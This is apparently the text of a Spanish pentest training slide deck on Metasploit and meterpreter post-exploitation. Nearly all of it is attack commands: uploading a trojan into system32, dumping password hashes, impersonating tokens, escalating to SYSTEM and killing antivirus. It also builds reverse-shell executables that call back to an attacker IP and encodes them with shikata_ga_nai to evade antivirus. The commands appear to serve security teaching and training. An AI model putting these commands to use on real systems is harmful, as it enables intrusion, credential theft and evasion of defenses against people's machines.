Andrs Morales Zamudio andresmoraleszamudio@gmail.

com OSCP OSWP GCIH GPEN CPTS C|EH OSCE ISO 27001 LA CISSP

 Auxiliares Mdulos de meterpreter

Incognito Espia Escalando Scripts

Elaboracin de payloads .exe Adis antivirus

 Ingeniero de Sistemas Ingeniero de Preventa en Ximark OSCP OSWP GCIH GPEN CPTS C|EH OSCE ISO 27001 LA CISSP Cuatro aos de experiencia en Seguridad de la informacin, realizando Pentest, manejo de incidente y anlisis forense en Gobierno, Banca, Telco y Retail en la regin. Ekoparty Warrior, vencedor del primer PacketWars realizado en Latinoamrica. Octubre 2008, Argentina.

 Port Scanning
msf > search portscan msf > use auxiliary/scanner/portscan/syn

SMB Version Scanning

msf > use auxiliary/scanner/smb/version msf auxiliary(version) > db_hosts

meterpreter > help meterpreter > ps meterpreter > migrate pid meterpreter > ls meterpreter > download c:\\boot.ini meterpreter > upload troyano.exe c:\\windows\\system32

meterpreter > ipconfig meterpreter > getuid meterpreter > execute -f cmd.exe -i H meterpreter > shell meterpreter > idletime meterpreter > hashdump

meterpreter > use incognito meterpreter > help meterpreter > list_tokens u meterpreter > impersonate_token WIN2K8\\Administrator meterpreter > getuid meterpreter > execute -f cmd.exe -i -t
http://labs.mwrinfosecurity.com/publications/mwri_security-implications-ofwindows-access-tokens_2008-04-14.pdf

 meterpreter > ps meterpreter > migrate 260

Pid Explorer.exe

meterpreter > use espia meterpreter > screengrab

meterpreter > getuid meterpreter > use priv meterpreter > getsystem h meterpreter > getsystem ...got system (via technique 4). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

meterpreter > run checkvm meterpreter > run getcountermeasure meterpreter > run getgui meterpreter > run getgui e meterpreter > run gettelnet meterpreter > run gettelnet e meterpreter > run killav

meterpreter > run get_local_subnets meterpreter > run hostsedit meterpreter > run remotewinenum meterpreter > run remotewinenum -u administrador -p yotengolacontrasena -t 10.211.55.128 meterpreter > run winenum meterpreter > run scraper

 ./msfpayload windows/shell_reverse_tcp O ./msfpayload windows/shell_reverse_tcp LHOST=192.168.147.128 LPORT=8080 O ./msfpayload windows/shell_reverse_tcp LHOST=192.168.147.128 LPORT=8080 X > /tmp/1.exe file /tmp/1.exe

 ./msfpayload windows/shell_reverse_tcp LHOST=192.168.147.128 LPORT=8080 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe

./msfpayload windows/shell/reverse_tcp LHOST=192.168.147.128 LPORT=8080 X > /tmp/a.exe ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.147.128 LPORT=8080 E
http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass

GRACIAS!